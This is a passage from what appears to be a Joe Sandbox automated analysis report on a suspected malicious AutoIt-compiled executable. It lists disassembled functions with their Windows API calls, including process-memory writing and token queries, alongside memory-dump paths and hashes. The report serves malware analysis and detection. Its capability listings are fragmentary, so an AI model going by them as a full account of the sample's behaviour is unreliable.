                                                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                        • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                                                                                        • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                        • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                                                                                        Function 00465244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                        • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                                                                                        • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                        • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                                                                                        Function 0045810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                                        • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                                                                                        • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                                        • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                                                                                        Function 0045C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                                                                                        • MessageBeep.USER32(00000000), ref: 0045C226
                                                                                        • KillTimer.USER32(?,0000040A), ref: 0045C242
                                                                                        • EndDialog.USER32(?,00000001), ref: 0045C25C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                                        • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                                                                                        • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                                        • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                                                                                        Function 004013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EndPath.GDI32(?), ref: 004013BF
                                                                                        • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                                                                        • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                                                        • DeleteObject.GDI32 ref: 00401401
                                                                                        • StrokePath.GDI32(?), ref: 0040141C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2625713937-0
                                                                                        • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                                        • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                                                                                        • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                                        • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                                                                                        Function 00412CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                                                                        • __swprintf.LIBCMT ref: 00412ECD
                                                                                        Strings
                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                        • API String ID: 1943609520-557222456
                                                                                        • Opcode ID: f2537484895ed5ec52989982d5153f2265213e107307e8104f4bcaf0829080bd
                                                                                        • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                                                                                        • Opcode Fuzzy Hash: f2537484895ed5ec52989982d5153f2265213e107307e8104f4bcaf0829080bd
                                                                                        • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                                                                                        Function 0045B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContainedObject
                                                                                        • String ID: AutoIt3GUI$Container$%I
                                                                                        • API String ID: 3565006973-4251005282
                                                                                        • Opcode ID: b0ef9ef2592e363b8beabdfb88cbb6824cc0f8258bc98d745d804ae61dd96c16
                                                                                        • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                                                                                        • Opcode Fuzzy Hash: b0ef9ef2592e363b8beabdfb88cbb6824cc0f8258bc98d745d804ae61dd96c16
                                                                                        • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                                                                                        Function 0042501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                                                                          • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__87except__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 2905807303-2276729525
                                                                                        • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                                        • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                                                                                        • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                                        • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                                                                                        Function 00448584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: 3cA$_A
                                                                                        • API String ID: 4104443479-3480954128
                                                                                        • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                        • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                                                                        • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                        • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                                                                        Function 004597F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00459296,?,?,00000034,00000800,?,00000034), ref: 004614E6
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0045983F
                                                                                          • Part of subcall function 00461487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004614B1
                                                                                          • Part of subcall function 004613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00461409
                                                                                          • Part of subcall function 004613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 00461419
                                                                                          • Part of subcall function 004613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 0046142F
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598AC
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598F9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @
                                                                                        • API String ID: 4150878124-2766056989
                                                                                        • Opcode ID: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                                                                                        • Instruction ID: 83720f96416bb9890d74edf788c2ecf3a7fc11859df44560b8e2e1ee8df86db8
                                                                                        • Opcode Fuzzy Hash: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                                                                                        • Instruction Fuzzy Hash: 8E41627690021CBFDB10DFA5CC41EDEBBB8EB05300F14415AF945B7251DA746E89CBA5
                                                                                        Function 004873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                        • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                                                                        • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                        • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                                                                        Function 00486CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MoveWindow
                                                                                        • String ID: Listbox
                                                                                        • API String ID: 3315199576-2633736733
                                                                                        • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                        • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                                                                        • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                        • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                                                                        Function 0048770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00487772
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00487787
                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00487794
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: msctls_trackbar32
                                                                                        • API String ID: 3850602802-1010561917
                                                                                        • Opcode ID: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                                                                                        • Instruction ID: f92afa797eeb34fec66cc861e9e49cfc52a42a3b8dc3c72e421b2ad803853977
                                                                                        • Opcode Fuzzy Hash: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                                                                                        • Instruction Fuzzy Hash: 78112732204208BEEF106F61CC01FDF7768EF88B54F21052EFA41A21A0C275F851CB24
                                                                                        Function 00426B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
